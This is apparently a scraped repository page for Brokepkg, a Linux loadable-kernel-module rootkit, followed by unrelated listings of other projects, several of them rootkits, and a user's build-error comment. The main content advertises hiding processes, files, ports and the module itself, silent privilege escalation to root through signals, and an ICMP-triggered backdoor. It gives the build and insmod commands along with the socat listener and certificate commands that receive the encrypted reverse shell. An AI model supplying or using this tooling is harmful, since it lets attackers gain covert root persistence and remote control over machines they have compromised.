The LKM rootkit working in Linux Kernels 2.6.x/3.x/4.x/5.x

Overview

BrokePkg


Brokepkg is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64, with suport after kernel 5.7, without kallsyms_lookup_name.

Tested on

  • Kali linux: 5.10.0-kali3-amd64
  • Linux mint: 4.19.0-8-amd64

Features

  • Hide/unhide any process by sending a signal 63;

  • Sending a signal 31(to any pid) makes the module become (in)visible;

  • Sending a signal 64(to any pid) makes the given user become root;

  • Files or directories starting with the PREFIX become invisible;

  • Sending a signal 62 to some port you make he invisible;

Install

sudo apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/R3tr074/brokepkg
cd brokepkg
make
sudo insmod brokepkg.ko

Uninstall

Remove brokepkg invisibility to uninstall him

kill -31 0

Then remove the module

sudo rmmod brokepkg

References

You might also like...
Estudos sobre LKM - Linux Kernel Module.
Estudos sobre LKM - Linux Kernel Module.

Linux Kernel Module - Part 1 Explicação geral de toda estrutura do nosso LKM. Bom, temos aqui então todo nosso cabeçalho de includes de bibliotecas. V

Linux rootkit used to hide a cryptominer process and CPU usage.

Linux rootkit used to hide a cryptominer process and CPU usage.

LKM Command Line Parsing - Parte 2
LKM Command Line Parsing - Parte 2

LKM-Command-Line-Parsing 👾 Hoje iremos falar sobre Command Line Parsing diretamente no LKM. Esse é a segunda parte da nossa série de estudos para Roo

Minimal Linux Live (MLL) is a tiny educational Linux distribution, which is designed to be built from scratch by using a collection of automated shell scripts. Minimal Linux Live offers a core environment with just the Linux kernel, GNU C library, and Busybox userland utilities.
Minimal Linux Live (MLL) is a tiny educational Linux distribution, which is designed to be built from scratch by using a collection of automated shell scripts. Minimal Linux Live offers a core environment with just the Linux kernel, GNU C library, and Busybox userland utilities.

Minimal Linux Live (MLL) is a tiny educational Linux distribution, which is designed to be built from scratch by using a collection of automated shell scripts. Minimal Linux Live offers a core environment with just the Linux kernel, GNU C library, and Busybox userland utilities.

An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples

rootkit-arsenal-guacamole An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples All projects have been por

Windows x64 rootkit
Windows x64 rootkit

P4tch3r Windows x64 rootkit (tested on Windows 7) It's PoC of patching NtTerminateProcess function by just overwriting instructions catching arguments

A simple Windows kernel rootkit.
A simple Windows kernel rootkit.

Venom RootKit A simple windows rootkit that I have wrote, In order to explore a bit about the world of rootkits and windows kernel in general. The Ven

LD_PRELOAD Rootkit

LD_PRELOAD Rootkit

yark - Yet Another RootKit

yark - Yet Another RootKit How to Build Requirements In order to build the kernel module, you need to install the kernel-headers package corresponding

To have platform independent network interfaces over usb which is working with Linux, Windows, Mac OS ect.
To have platform independent network interfaces over usb which is working with Linux, Windows, Mac OS ect.

To have platform independent network interfaces over usb which is working with Linux, Windows, Mac OS ect. called RNDIS. This project is a RNDIS demo, which addtionally implements a http server. It runs out of the box on a stm32f411 BlackPill board. My RNDIS library with an empty template for the second interface (which can ba UART, CAN, ETH or like in this demo a tcp/ip stack) can be found under following link: https://github.com/RDMsmartnetworks/STM32_HAL_RNDIS

A simple C library for working with KD-Trees

kdtree Overview kdtree is a simple, easy to use C library for working with kd-trees. Kd-trees are an extension of binary search trees to k-dimensional

a playground for working with fully static tensors and automatic differentiation

This is a playground for learning about how to apply template-meta-programming to get more efficient evaluation for tensor-based automatic differentiation.

Terminal calculator made for programmers working with multiple number representations, sizes, and overall close to the bits
Terminal calculator made for programmers working with multiple number representations, sizes, and overall close to the bits

Programmer calculator The programmer calculator is a simple terminal tool designed to give maximum efficiency and flexibility to the programmer workin

Fork of Cutter from the last working commit with radare2
Fork of Cutter from the last working commit with radare2

r2cutter r2cutter is the continuation of Cutter before the fork to keep radare2 as backend. Focus on supporting latest version of radare2 Recommend th

The PULP Ara is a 64-bit Vector Unit, compatible with the RISC-V Vector Extension Version 0.9, working as a coprocessor to CORE-V's CVA6 core

Ara Ara is a vector unit working as a coprocessor for the CVA6 core. It supports the RISC-V Vector Extension, version 0.9. Dependencies Check DEPENDEN

A guide and set of tools for working with TinyML powered Audio Sensors
A guide and set of tools for working with TinyML powered Audio Sensors

Audio Sensor Toolkit This is a guide on how to build an Audio Sensor using Machine Learning, and helpful tools. Audio Sensor Guide Audio Tools Acceler

Servo library with stm developed by the Liek Software Team. We are working on new versions.

Liek-Servo-Library Liek Servo Library is a library that makes it easy for you to drive servo motors with STM32F10x series cards. The library is still

Comments
  • make error

    make error

    make -C /lib/modules/3.10.0-327.el7.x86_64/build M=/tmp/brokepkg modules make: *** /lib/modules/3.10.0-327.el7.x86_64/build: No such file or directory. Stop. make: *** [all] Error 2

    3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

    CentOS Linux release 7.2.1511 (Core)

    opened by shinegod 5
Releases(0.8)
  • 0.8(Apr 7, 2021)

    Backdoor full tty and traffic encrypted with openssl

    How client work?

    The brokecli send a icmp packet with the password, defined in backdoor header, magic number, also defined in the defined in backdoor header, host and port to receive reverse shell.


    To use with ngrok is necessary 2 terminals, 1 to lister and other to send the packet, as in the example:

    The lister use the socat, this mode:

    socat file:`tty`,raw,echo=0 openssl-listen:<port to listen>,cert=<path to .pem file>,verify=0,fork
    

    The client necessarily needs to have .pem, if you need create one run this:

    openssl req -newkey rsa:2048 -nodes -keyout /tmp/brokepkg.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out /tmp/brokepkg.crt
    cat /tmp/brokepkg.{key,crt} > /tmp/brokepkg.pem
    

    Not forget use -q flag in your terminal to not crash if you use with the ngrok.


    hashs

    brokecli amd64

    • md5: f17b75e9eff63e7e1c258948037f8fd5
    • sha1: 5e3d3c24f29ffb36cdce4ac274f160857b8272b6

    brokecli i386

    • md5: 0136e264cd07ed22d5434810110531c6
    • sha1: 572010f6493bc9f23d0a9148cda0d41757d06d94
    Source code(tar.gz)
    Source code(zip)
    brokecli_0.8_amd64(17.67 KB)
    brokecli_0.8_i386(16.38 KB)
Owner
Jorge Buzeti
Programmer and student of offensive security.
Jorge Buzeti
Complementary Concurrency Programs for course "Linux Kernel Internals"

Complementary Programs for course "Linux Kernel Internals" Project Listing tpool: A lightweight thread pool. tinync: A tiny nc implementation using co

null 235 Nov 18, 2022
A library OS for Linux multi-process applications, with Intel SGX support

Graphene Library OS with Intel SGX Support A Linux-compatible Library OS for Multi-Process Applications NOTE: We are in the middle of transitioning ou

The Gramine Project 303 Nov 22, 2022
High Performance Linux C++ Network Programming Framework based on IO Multiplexing and Thread Pool

Kingpin is a C++ network programming framework based on TCP/IP + epoll + pthread, aims to implement a library for the high concurrent servers and clie

null 23 Oct 19, 2022
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to

Marcos S. Bajo 91 Nov 9, 2022
LKM Rootkit Kernel 2016 (Updated)

SIG SIG is a Linux kernel rootkit that comes as a single LKM (Loadable Kernel Module) and it is totally restricted to kernel 2.6.32. The rootkit is de

null 1 Aug 13, 2022
64-bit LKM Rootkit builder based on yaml prescription

1337kit - LKM Rootkit Builder About project 1337kit is 64-bit LKM Rootkit builder based on yaml prescription Fully tested on: Linux 5.11.0-34-generic

Lukas Balazik 17 Oct 19, 2022
4.8 Rootkit Kernel LKM

4.8 Rootkit Kernel "Eu vou instalar módulos em você e vou fazer o que eu quiser!!!!" - Disse o (SER) Sigma's Rootkit Kernel para o Kernel 4.8 (Ainda c

null 0 Aug 13, 2022
✔️The smallest header-only GUI library(4 KLOC) for all platforms

Welcome to GUI-lite The smallest header-only GUI library (4 KLOC) for all platforms. 中文 Lightweight ✂️ Small: 4,000+ lines of C++ code, zero dependenc

null 6.5k Nov 24, 2022
A python library to run metal compute kernels on MacOS

metalcompute for Python A python library to run metal compute kernels on MacOS Usage Example execution from M1-based Mac running MacOS 12.0: > ./build

Andrew Baldwin 21 Nov 7, 2022
How do I submit patches to Android Common Kernels

How do I submit patches to Android Common Kernels BEST: Make all of your changes to upstream Linux. If appropriate, backport to the stable releases. T

MangoPi 8 Apr 7, 2022